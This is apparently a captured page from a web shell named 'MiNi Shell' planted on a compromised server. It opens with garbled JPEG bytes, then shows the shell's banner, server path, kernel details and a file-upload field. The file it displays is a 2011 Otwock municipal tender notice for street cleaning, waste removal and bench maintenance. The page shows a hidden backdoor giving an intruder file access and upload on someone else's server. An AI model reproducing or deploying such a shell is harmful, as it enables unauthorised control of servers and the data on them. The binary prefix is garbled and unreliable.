JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111216/334767-N-2011.html

<p class="kh_header"><b>Otwock: Utrzymanie czystości i porządku na terenie miasta Otwocka w 2012 roku.</b><br>
<b>Numer ogłoszenia: 334767 - 2011; data zamieszczenia: 16.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Otwock , ul. Armii Krajowej 5, 05-400 Otwock, woj. mazowieckie, tel. 022 7792001, faks 022 7794225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.otwock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości i porządku na terenie miasta Otwocka w 2012 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług polegających na utrzymaniu czystości i  porządku na  terenie miasta Otwocka.
2.	Zakres przedmiotu zamówienia obejmuje:
1)	prace  porządkowe, takie jak: zbieranie śmieci z terenów ciągów pieszych, obszarów  zielonych, parku miejskiego i innych miejsc mających charakter publiczny, zamiatanie przy ławkach, usuwanie ogłoszeń i plakatów z tablic oraz słupów ogłoszeniowych, porządkowanie mogił żołnierskich i miejsc pamięci narodowej i inne,
2)	eksploatację koszy ulicznych,
3)	usuwanie z ulic rozlewisk wody opadowej,
4)	likwidację tzw. dzikich wysypisk, t.j. załadunek odpadów do kontenera, również tych zebranych w promieniu 5 m od wysypiska i wywóz odpadów na składowisko, 
5)	demontaż tablic ogłoszeniowych,
6)	utrzymanie w czystości wiat przystankowych, tj. oczyszczenie szyb, dachu, ławek, elementów z blachy,  usunięcie zanieczyszczeń z  rynien,
7)	naprawę ławek,
8)  malowanie ławek farbą olejną oraz bejcą i farbą akrylową,
9)  demontaż ławek,
 10)	montaż ławek zakupionych przez Zamawiającego,
 11)	udekorowanie grobów żołnierskich chryzantemami w doniczkach oraz zniczami z koazji Święta  Wszystkich Świętych,
 12)  udekorowanie lampkami choinki rosnącej na Skwerze 7 Pułku Łączności na dzień 6 grudnia, 
 13)	ustawienie na Skwerze Lennenstadt choinki zakupionej przez Wykonawcę i udekorowanie lampkami na dzień 6 grudnia,
 14)	wywóz odpadów komunalnych na składowisko - dotyczy prac porządkowych, o których mowa w pkt.1,
 15)	wywóz odpadów wielkogabarytowych na składowisko.
3.	Wyżej wymienione prace będą realizowane w oparciu o zlecenia jednostkowe zawierające zakres i termin wykonania, przekazywane przez Zamawiającego. Wykonanie prac w soboty, niedziele i święta będzie następowało na zlecenie i w zakresie określonym przez Zamawiającego, po poinformowaniu Wykonawcy z jednodniowym wyprzedzeniem. 
4. Kontrola realizacji przedmiotu zamówienia środkami transportu Wykonawcy.
5.  Rozliczenie prac, o których mowa w pkt. 2. następować będzie w oparciu o zaoferowane przez Wykonawcę w ofercie przetargowej ceny netto po narzutach: 
1) 	za 1 roboczogodzinę,
2) 	za eksploatację 1 kosza ulicznego,
3) 	za usunięcie z ulicy 1 m3  wody opadowej,
4) 	za likwidację tzw. dzikiego  wysypiska - za 1 tonę, 
5) 	za demontaż 1 tablicy ogłoszeniowej,
6) 	za utrzymanie w czystości 1 wiaty przystankowej,
7) 	za naprawę 1 ławki, tj. wymianę 1 listwy wąskiej,
8)    za naprawę 1 ławki, tj. wymianę 1 listwy szerokiej,
9)    za pomalowanie 1 ławki z oparciem - listwy drewniane oraz elementy żeliwne,
10) 	za pomalowanie 1 ławki bez oparcia - listwy drewniane,
 11) 	za demontaż 1 ławki,
 12)    za montaż 1 ławki,
 13)  za udekorowanie grobów żołnierskich chryzantemami w doniczkach oraz zniczami z okazji  Święta Wszystkich Świętych
 14)    za udekorowanie lampkami choinki rosnącej na Skwerze 7 Pułku Łączności,
 15)    za ustawienie i udekorowanie lampkami choinki na  Skwerze Lennenstadt,
 16) 	za wywóz 1 tony odpadów komunalnych na składowisko,
 17) 	za wywóz 1 tony odpadów wielkogabarytowych na składowisko.
6. Do  zaoferowanych  cen  netto  po  narzutach  doliczone  zostaną  należne  stawki  podatku  VAT.
7. Ceny wymienione  w  pkt. 5. skalkulowane przez Wykonawcę winny uwzględniać wszystkie koszty związane z wykonaniem przedmiotu  zamówienia, tj. pracy ludzi, sprzętu, materiałów, wywozu odpadów stałych na  składowisko i składowanie, wywozu odpadów ciekłych na zlewnię i utylizację.
8.	Ceny za wywóz na składowisko 1 tony odpadów komunalnych oraz 1 tony odpadów wielkogabarytowych skalkulowane przez Wykonawcę winny  uwzględniać koszty załadunku, koszty transportu na terenie miasta oraz na składowisko,  a także koszty składowania odpadów na składowisku.
9.  Zakres przedmiotu zamówienia przewidywany do wykonania w okresie obowiązywania umowy:
1)	prace porządkowe - 9.000  r-g,
2)	eksploatacja koszy ulicznych  -  72.000 szt.,
3)	usuwanie z ulic  rozlewisk wody opadowej -  1.000 m3 ,
4)	likwidacja tzw. dzikich wysypisk  -  400 t,
5) 	demontaż tablic ogłoszeniowych, - 7 szt.,
6) 	utrzymanie w czystości  wiat  przystankowych   35 szt. - 2 krotne,
7) 	naprawa ławek  -  wymiana  listew  wąskich - 20 szt.,
8) 	naprawa ławek  - wymiana listew  szerokich - 20 szt.,
9) 	malowanie ławek z oparciem -  60 szt.,
10)   malowanie ławek bez oparcia - 61 szt.
11) 	demontaż ławek  - 5 szt.,
12) 	montaż ławek  -  17 szt.,
13)  udekorowanie grobów żołnierskich chryzantemami w doniczkach - 200 szt. oraz  zniczami  - 200 szt., z okazji Święta Wszystkich Świętych
14) 	udekorowanie lampkami  - 12 kompletów - choinki rosnącej  na Skwerze 7 Pułku Łączności na dzień 6  grudnia,
15) 	ustawienie na Skwerze Lennenstadt choinki zakupionej przez Wykonawcę i udekorowanie lampkami - 14 kompletów - na dzień 6 grudnia,
16) 	wywóz odpadów komunalnych na składowisko  -  350 ton,
17) 	wywóz odpadów wielkogabarytowych na składowisko  -  50 ton .
10. Zamawiający zastrzega sobie, że przewidywany do wykonania zakres prac, o którym mowa w pkt. 9. nie jest obligatoryjny i może ulec zmianie w zależności od potrzeb.
11. Całkowite wynagrodzenie należne Wykonawcy będzie uzależnione od faktycznie wykonanych prac w okresie obowiązywania umowy. 
12.  W  ramach realizacji przedmiotu zamówienia w części dotyczącej usług o których mowa w pkt. 2.2) do obowiązków Wykonawcy  należy: 
1) 	opróżnianie koszy ulicznych o określonych lokalizacjach na terenie miasta,  t.j.:
-	w poniedziałki, środy i piątki opróżniane będą kosze z obszaru całego miasta w ilości 280 szt.,
-  we wtorki, czwartki i soboty opróżniane będą kosze z wybranych ciągów ulicznych w ilości 124 szt.
-	opróżnianie koszy w parku miejskim w poniedziałki i piątki w ilości  50 szt.
2) 	opróżnianie koszy ulicznych w niedziele i święta będzie następowało na zlecenie Zamawiającego, po poinformowaniu Wykonawcy  z jednodniowym wyprzedzeniem,
3) 	zebranie i wywiezienie na składowisko odpadów znajdujących się w promieniu 1 metra od opróżnianego kosza, a także odpadów znajdujących się w promieniu do 5 metrów od kosza jeżeli zachodzi prawdopodobieństwo, że zostały one z kosza wyjęte,
4) 	utrzymywanie w czystości koszy ulicznych, a w szczególności mycie koszy plastikowych i metalowych oraz utrzymywanie w czystości miejsc pod wkładami w koszach betonowych,
5)	 bieżąca konserwacja i naprawa koszy, słupków, uchwytów  itp.,
6) 	demontaż koszy uszkodzonych oraz ich przechowywanie,
7)  	przemieszczanie koszy zgodnie z wymaganiami Zamawiającego,
8) 	ustawianie i montaż  nowych  koszy  zakupionych przez  Zamawiającego w ilości do 100 szt. 
oraz uzupełnianie wkładów metalowych zakupionych przez Zamawiającego,
9) 	informowanie Zamawiającego o nieprawidłowościach i okolicznościach wpływających na realizację  zamówienia,  takich  jak  zaginięcia, zniszczenia, przemieszczenia  koszy  itp.
13.  	Opróżnianie koszy ulicznych, zebranie odpadów, a także wywiezienie odpadów na składowisko, o których mowa w pkt 12. 1-3 powinno być  zorganizowane w  taki sposób, aby  było  ono  każdego  dnia,  z   wyjątkiem  sobót,  zakończone do godziny 15:00, a w przypadku około 50 szt.  koszy  wskazanych  przez Zamawiającego do godz. 9:00. W soboty opróżnianie koszy powinno rozpocząć się w godzinach południowych i winno być zakończone do godziny 18:00, a w rejonie ścisłego centrum ograniczonego  ulicami: Powstańców Warszawy, Staszica, Świderska, Orla oraz przy ulicach Batorego, Bez nazwy i Sportowej opróżnienie  koszy  musi  nastąpić  po  zakończeniu pracy  placówek  handlowych.
14. Zamawiający zastrzega sobie prawo do zmiany ilości - zmniejszenia lub zwiększenia liczby eksploatowanych koszy, lecz nie więcej niż o 100 szt. w okresie trwania umowy, a także do zmiany częstotliwości  opróżniania  koszy  ulicznych w zależności  od  potrzeb.
15.  Cena za opróżnienie 1 kosza ulicznego skalkulowana przez Wykonawcę winna uwzględniać koszty robocizny, materiałów i sprzętu  związane wykonaniem  czynności, o których mowa w pkt  12. i 13, a  także  koszty  wywiezienia odpadów z koszy i bezpośrednich okolic na składowisko oraz  koszty składowania odpadów.
16.  W ramach realizacji przedmiotu zamówienia w części dotyczącej usług, o których mowa w pkt 2.3) do obowiązków Wykonawcy należy przystąpienie do wybierania wody z ulic niezwłocznie po otrzymaniu informacji od Zamawiającego, przy użyciu niezbędnej ilości sprzętu pozwalającej na realizację zleconych prac w ciągu 8 godzin,  a  w sytuacjach  zagrażających  bezpieczeństwu ruchu  drogowego  najpóźniej  w  ciągu 3 godzin. 
17. Ilość odpadów komunalnych i wielkogabarytowych wywiezionych i złożonych  na składowisku Wykonawca powinien udokumentować  potwierdzeniami  wystawionymi przez składowisko.
18.	Ilość wywiezionej i zutylizowanej wody opadowej Wykonawca powinien udokumentować  potwierdzeniami wystawionymi  przez stację zlewną..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.43.00.00-0, 90.51.10.00-2, 90.51.13.00-5, 90.51.20.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż posiada:
	a) zezwolenie na odbieranie odpadów komunalnych od właścicieli nieruchomości  z terenu Otwocka zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach,
	b) zezwolenie na opróżnianie zbiorników bezodpływowych i transportu nieczystości ciekłych z terenu Otwocka zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku  w gminach,
	c) zezwolenie wydane na podstawie art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach.
	(w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten musi być spełniony przynajmniej przez jednego Wykonawcę)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż zrealizował w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest  krótszy w tym okresie, co najmniej dwie usługi polegające na  utrzymaniu czystości i porządku (tj. wykonywanie prac porządkowych lub eksploatacja koszy ulicznych  lub usuwanie rozlewisk wód opadowych z ulic ) o wartości co najmniej 600.000,00 PLN każda. 
	(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna wiedza i doświadczenie)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, iż:
		dysponuje co najmniej następującym sprzętem niezbędnym do realizacji zamówienia :
	-  1 samochód  samowyładowczy  o ładowności nie mniejszej niż 5 t,
         -   2 samochody ze zdejmowanymi pojemnikami o pojemności nie mniejszej niż 7 m3 każdy,
	-  3  pojazdy  asenizacyjne  o  pojemności  nie mniejszej  niż  7 m3  każdy,
	-  1  samochód  dostawczy o ładowności nie mniejszej niż  0,9 t, 
	(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż posiada środki finansowe w wysokości co najmniej 200.000,00 PLN  lub zdolność kredytową w wysokości co najmniej 200.000,00 PLN
	(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków udziału w postępowaniu, polega na
zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany
jest udowodnić Zamawiającemu, iz będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych
podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich
przy wykonaniu zamówienia. W przypadku gdy Wykonawcę reprezentuje Pełnomocnik
(dotyczy również Wykonawców wspólnie ubiegających się o udzielenie zamówienia), do
oferty musi zostać załączone pełnomocnictwo, określające jego zakres, podpisane przez
osoby uprawnione do reprezentowania Wykonawcy. Pełnomocnictwo należy przedłożyć w
oryginale lub kopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się  istotnych  zmian  postanowień umowy w stosunku do treści oferty, na podstawie  której dokonano wyboru Wykonawcy,  z wyjątkiem  zapisów  w  ust. 2.
 2. Zamawiający przewiduje możliwość dokonania zmian umowy w zakresie ilości oraz częstotliwości prac wymienionych w § 1 ust.2  umowy, w zależności od potrzeb, w ramach kwoty objętej  umową.
 3. Zmiany umowy wymagają pisemnej formy w postaci aneksu podpisanego przez Strony  pod  rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.otwock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać nieodpłatnie w siedzibie
Zamawiającego budynek B pok. 9 w godzinach 9.00-15.00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2011 godzina 10:00, miejsce: Urząd Miasta Otwocka ul. Armii Krajowej 5
budynek B, pokój nr 1 (Biuro Obsługi Mieszkańców)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com